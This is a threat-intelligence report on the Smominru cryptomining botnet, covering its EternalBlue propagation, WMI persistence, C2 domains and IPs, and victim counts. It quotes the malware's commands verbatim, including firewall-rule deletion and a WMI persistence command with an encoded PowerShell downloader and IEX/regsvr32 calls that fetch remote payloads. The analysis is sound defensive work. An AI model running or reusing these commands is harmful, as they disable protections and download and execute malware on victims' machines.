Summary
Beginning in August of 2017, a new cryptocurrency mining botnet, dubbed Smominru, started propagating via the recently leaked Eternal Blue exploit. Smominru, aka MyKings, is characterized by the targeting of Windows systems using WMI as a file-less persistence mechanism.[1]
As of March 2019, Smominru showed no signs of slowing down. Wapack Labs has identified approximately 316K victims connecting to Smominru infrastructure over a period of 6 days. This report provides a high-level overview on the malware installation as well as details on the Smominru infrastructure and botnet.
Details
After the leak of NSA developed exploits in 2017, several attackers incorporated them into malware campaigns. One of these came to be known as Smominru, a self-propagating botnet intended primarily for cryptocurrency mining. Smominru uses the Eternal Blue exploit[2] to infect systems and install a WMI payload. This payload triggers a number of additional commands and payload downloads including the cryptocurrency miner as well as Mimikatz, a popular info stealer malware.
Along with the WMI payload, Smominru then executes a large number of commands on the victim in order to prep the system. Among these are commands for killing processes and services, changing access rights and reconfiguring the firewall. [1] Example commands:
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe…
netsh advfirewall firewall delete rule name="tcp all" dir=in netsh advfirewall firewall delete rule name="deny tcp 445" dir=in netsh advfirewall firewall delete rule name="deny tcp 139" dir=in netsh advfirewall firewall delete rule name="tcpall" dir=out
cacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe |
The malware uses the WMI console commands (WMIC) to trigger additional downloads.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckyoumm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\"" |
This also achieves persistence via configuration of an event filter named ‘fuckyoumm3’, which runs every 10800 seconds. This is also a convenient way for the attacker to install additional malware on all of the bots since they can switch out the hosted files. The Monero mining malware is finally installed, makes a connection to pool.minexmr.com to retrieve its configuration and begin mining.
Infrastructure
Smominru has used a number of different endpoints since it emerged in 2017. Its current network consists of a handful of IP addresses and domains. Most of the known domains share the same registrant email: billkillmenow@gmail.com. Domains use the same loose naming convention consisting of a combination of words and numbers. A couple domains use the string ‘mykings’ which is an alias name for Smominru. The domains use the Reg.ru registrar as well as the following state and country configurations:
Registrant State/Province: msk
Registrant Country: BF
Several other domains use a registrant email address ira.malikova78@mail.ru. The Smominru actors tried to obfuscate this email by using Whois protection services however, it was identified by examining historic Whois records prior to the Whois protection.
The following is an example Whois record:
Domain Name: 1217BYE.HOST Registry Domain ID: D87766657-CNIC Registrar WHOIS Server: whois.reg.ru Registrar URL: https://www.reg.ru/ Updated Date: 2018-12-21T17:13:05.0Z Creation Date: 2018-12-16T17:08:54.0Z Registry Expiry Date: 2019-12-16T23:59:59.0Z Registrar: Registrar of Domain Names REG.RU, LLC Registrar IANA ID: 1606 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Registrant State/Province: msk Registrant Country: BF Registrant Phone: +7.4957654321 Registrant Email: billkillmenow@gmail.com Admin Phone: +7.4957654321 Admin Email: billkillmenow@gmail.com Tech Phone: +7.4957654321 Tech Email: billkillmenow@gmail.com Name Server: NS1.REG.RU Name Server: NS2.REG.RU DNSSEC: unsigned Billing Phone: +7.4957654321 Billing Email: billkillmenow@gmail.com Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2019-03-25T16:38:02.0Z <<< |
The following table lists domains that are currently registered by Smominru actors.
VALUE | Created | Registration info |
1217bye.host | 2018-12-16 | billkillmenow@gmail.com |
1226bye.pw | 2018-12-26 | billkillmenow@gmail.com |
1226bye.xyz | 2018-12-25 | billkillmenow@gmail.com |
5b6b7b.info | 2017-01-21 | billkillmenow@gmail.com |
down0116.info | 2018-01-16 | billkillmenow@gmail.com |
ftp0118.info | 2018-01-18 | billkillmenow@gmail.com |
ftp0930.host | 2018-09-30 | billkillmenow@gmail.com |
ms1128.site | 2018-11-28 | billkillmenow@gmail.com |
mykings.pw | 2018-04-11 | Protected Whois. Initially observed registrant: ira.malikova78@mail.ru |
mykings.xyz |
| sinkholed |
mys2018.xyz | 2018-03-23 | Registrant State/Province: msk Registrant Country: BF Reg.ru |
pc0416.xyz | 2018-04-16 | Registrar URL: http://www.reg.com
Registrant State/Province: msk Registrant Country: BF |
wpd0126.info | Registrant State/Province: msk Registrant Country: BF Reg.ru | |
upme0611.info | 2018-06-10 | Registrant State/Province: msk Registrant Country: BF Reg.ru |
649183ca17.pw | 2018-09-03 | ira.malikova78@mail.ru
|
8e627797f3.pw | 2018-09-03 | ira.malikova78@mail.ru
|
Wapack Labs identified 10 IP addresses currently being leveraged for Smominru’s command and control infrastructure. IP address 174.128.230.162, which is currently being leveraged for 2nd stage downloads, was by far the most frequently observed with close to 300K unique IPs connecting.
Smominru C2 IP | Botnet Hits |
174.128.230.162 | 295230 |
45.58.135.106 | 69871 |
174.128.239.250 | 21202 |
66.117.6.174 | 1313 |
35.182.171.137 | 1107 |
64.32.3.186 | 1094 |
185.112.156.92 | 1088 |
223.25.247.240 | 511 |
173.208.139.170 | 353 |
208.110.71.194 | 316 |
Botnet
Wapack Labs analyzed traffic going to Smominru infrastructure over the course of 6 days and identified 316K unique IPs that are likely compromised with the Smominru coinminer. The vast majority were AS4134 No.31, Jin-rong Street which is the top botnet ASN across the board.
The geolocation of Smominru bots, revealed China and Russia to be the top two origins, with roughly the same number of bots each. Figure 3. shows the breakdown of bots by country.
Conclusion
Cryptocurrency mining botnets such a Smominru are especially problematic because not only can they lead to data loss, they also consume most of the processing power on an infected system. This also leads to more power consumption and greatly degrades the performance of the infected machine. Despite emergency patches issued by Microsoft, millions of systems still remained vulnerable to Eternal Blue, as of late 2018. So long as machines are unpatched, they are at risk of being recruited by Smominru.
[1] https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection
[1] https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/
Comments